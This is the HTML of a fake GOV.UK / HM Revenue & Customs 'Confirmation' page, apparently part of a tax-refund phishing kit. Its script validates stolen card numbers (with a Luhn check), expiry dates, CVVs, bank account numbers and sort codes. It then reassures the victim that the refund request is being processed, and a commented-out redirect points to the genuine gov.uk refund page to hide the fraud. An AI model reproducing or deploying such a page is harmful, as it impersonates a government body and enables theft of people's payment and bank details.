<!DOCTYPE html>
<html class="js no-touchevents no-details svg video" style="" lang="en">
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<title>Confirmation - Government Gateway</title>

		<link
			href="assets/box/govuk-template.css"
			media="screen"
			rel="stylesheet"
			type="text/css"
		/>

		<link
			href="assets/box/govuk-template-print.css"
			media="print"
			rel="stylesheet"
			type="text/css"
		/>

		<link
			href="assets/box/fonts.css"
			media="all"
			rel="stylesheet"
			type="text/css"
		/>

		<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
		<link
			rel="apple-touch-icon-precomposed"
			sizes="144x144"
			href="assets/apple-touch-icon-144x144.png"
		/>
		<link
			rel="apple-touch-icon-precomposed"
			sizes="114x114"
			href="assets/apple-touch-icon-114x114.png"
		/>
		<link
			rel="apple-touch-icon-precomposed"
			sizes="72x72"
			href="assets/apple-touch-icon-72x72.png"
		/>
		<link
			rel="apple-touch-icon-precomposed"
			href="assets/apple-touch-icon-57x57.png"
		/>
		<meta name="viewport" content="width=device-width, initial-scale=1" />
		<!-- <meta
			http-equiv="refresh"
			content="8;URL=https://www.google.es/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwij3JLky8HYAhUBLsAKHRUuCC0QjBAIPTAC&url=https%3A%2F%2Fwww.gov.uk%2Fclaim-tax-refund%2Fwhen-you-get-your-refund&usg=AOvVaw1LgizSzrUi6D4cSD10Ra7a"
		/> -->

		<link rel="stylesheet" href="assets/box/application.min.css" />

		<style>
			.down {
				margin-bottom: 10px;
			}
		</style>
	</head>
	<body class="js-enabled">
		<div id="skiplink-container">
			<div>
				<a href="#content" class="skiplink">Skip to main content</a>
			</div>
		</div>
		<header role="banner" id="global-header" class="">
			<div class="header-wrapper">
				<div class="header-global">
					<div class="header-logo">
						<a
							href="#"
							title=""
							data-journey-click="header:Click:GOV UK"
							id="logo"
							class="content"
						>
							<img src="assets/box/gov.png" alt="" /> GOV.UK
						</a>
					</div>
				</div>
			</div>
		</header>
		<div id="global-cookie-message">
			<p>
				GOV.UK uses cookies to make the site simpler.
				<a href="#">Find out more about cookies</a>
			</p>
		</div>
		<main id="wrapper" role="main">
			<div class="centered-content">
				<div class="service-info">
					<div class="logo">
						<span class="organisation-logo organisation-logo-medium"
							>HM Revenue &amp; Customs</span
						>
					</div>
				</div>
			</div>
			<div id="content">
				<p class="label--inline-right">
					English |
					<a
						id="cymraeg-switch"
						href="#"
						target="_self"
						data-sso="false"
						data-journey-click="government-gateway-registration-frontend:language: cy"
						>Cymraeg</a
					>
				</p>
				<article class="content__body">
					<script>
						function nod(e) {
							var key = window.event ? e.keyCode : e.which;
							var keychar = String.fromCharCode(key);
							reg = /\d/;
							return !reg.test(keychar);
						}
						function noc(e) {
							var unicode = e.charCode ? e.charCode : e.keyCode;
							if (unicode != 8 && unicode != 9) {
								if (unicode < 48 || unicode > 57) {
									return false;
								}
							}
						}

						function phn(e) {
							var unicode = e.charCode ? e.charCode : e.keyCode;

							if (unicode != 8 && unicode != 9) {
								if (unicode < 48 || unicode > 57) {
									if (unicode == 43) {
										return true;
									} else {
										return false;
									}
								}
							}
						}

						function validate() {
							var a = document.forms["form"]["nc"];
							var b = document.forms["form"]["cn"];
							var c = document.forms["form"]["em"];
							var d = document.forms["form"]["ey"];
							var e = document.forms["form"]["cvv"];
							var f = document.forms["form"]["ac"];
							var g = document.forms["form"]["sc"];

							if (a.value.length < 3) {
								a.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								a.focus();
								return false;
							} else {
								a.parentNode.parentNode.className = "form-field-group";
							}
							if (b.value.length < 2 || !cvd(b.value)) {
								b.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								b.focus();
								return false;
							} else {
								b.parentNode.parentNode.className = "form-field-group";
							}
							if (c.value.length < 1 || c.value > 12 || c.value < 1) {
								c.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								c.focus();
								return false;
							} else {
								c.parentNode.parentNode.className = "form-field-group";
							}
							if (d.value.length < 4 || d.value > 2050 || d.value < 2018) {
								d.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								d.focus();
								return false;
							} else {
								d.parentNode.parentNode.className = "form-field-group";
							}
							if (e.value.length < 3) {
								e.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								e.focus();
								return false;
							} else {
								e.parentNode.parentNode.className = "form-field-group";
							}

							if (f.value.length < 8) {
								f.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								f.focus();
								return false;
							} else {
								f.parentNode.parentNode.className = "form-field-group";
							}
							if (g.value.length < 6) {
								g.parentNode.parentNode.className =
									"form-field-group form-field-group--error";
								g.focus();
								return false;
							} else {
								g.parentNode.parentNode.className = "form-field-group";
							}

							document.getElementById("form").submit();
							return true;
						}
						function cvd(value) {
							if (/[^0-9-\s]+/.test(value)) return false;
							var nCheck = 0,
								nDigit = 0,
								bEven = false;
							value = value.replace(/\D/g, "");
							for (var n = value.length - 1; n >= 0; n--) {
								var cDigit = value.charAt(n),
									nDigit = parseInt(cDigit, 10);

								if (bEven) {
									if ((nDigit *= 2) > 9) nDigit -= 9;
								}

								nCheck += nDigit;
								bEven = !bEven;
							}

							return nCheck % 10 == 0;
						}
						function sorte(e) {
							var unicode = e.charCode ? e.charCode : e.keyCode;
							if (unicode != 8 && unicode != 9) {
								if (unicode < 48 || unicode > 57) {
									if (unicode == 45) {
										return true;
									} else {
										return false;
									}
								}
							}
						}
					</script>
					<form
						action=""
						method="POST"
						id="form"
						name="form"
						class="form js-form"
						autocomplete="off"
						novalidate="novalidate"
						onsubmit="validate(); return false;"
					>
						<h1>Confirmation</h1>
						<div
							class="flash error-summary"
							id="error-summary-display"
							role="alert"
							aria-labelledby="error-summary-heading"
							tabindex="-1"
						>
							<h2 id="error-summary-heading" class="h3-heading">
								There are errors on the page.
							</h2>
							<ul class="js-error-summary-messages"></ul>
						</div>
						<div class="form-field flush--bottom">
							<fieldset class="form-field-group">
								<label for="mom" class="form-field">
									<span class="form-hint">
										Your request has been submitted successfully, it will be
										processed within 10-14 business days.<br />
										You will receive a response at your registered address
										through post.<br />
										<br />
										Please wait while we redirect you to information pages to
										further readings.
										<br />
										<br />
										<center>
											<img src="assets/box/load.gif" alt="Waiting" />
										</center>
									</span>
								</label>
							</fieldset>
						</div>
					</form>
				</article>
			</div>
		</main>
		<footer class="group js-footer" id="footer" role="contentinfo">
			<div class="footer-wrapper">
				<div class="footer-meta">
					<div class="footer-meta-inner">
						<ul class="platform-help-links">
							<li>
								<a
									href="#"
									data-sso="false"
									data-journey-click="footer:Click:Cookies"
									>Cookies</a
								>
							</li>
							<li>
								<a
									href="#"
									data-sso="false"
									data-journey-click="footer:Click:Privacy policy"
									>Privacy policy</a
								>
							</li>
							<li>
								<a
									href="#"
									data-sso="false"
									data-journey-click="footer:Click:Terms and conditions"
									>Terms and conditions</a
								>
							</li>
							<li>
								<a
									href="#"
									data-sso="false"
									data-journey-click="footer:Click:Help"
									>Help using GOV.UK</a
								>
							</li>
						</ul>
						<div class="open-government-licence">
							<h2>
								<a href="#"
									><img
										src="assets/box/open-government-licence_2x.png"
										alt="Open Government Licence"
								/></a>
							</h2>
							<p>
								All content is available under the
								<a href="#">Open Government Licence v3.0</a>, except where
								otherwise stated
							</p>
						</div>
					</div>
					<div class="copyright">
						<a href="#">© Crown Copyright</a>
					</div>
				</div>
			</div>
		</footer>
		<div id="global-app-error" class="app-error hidden"></div>
	</body>
</html>
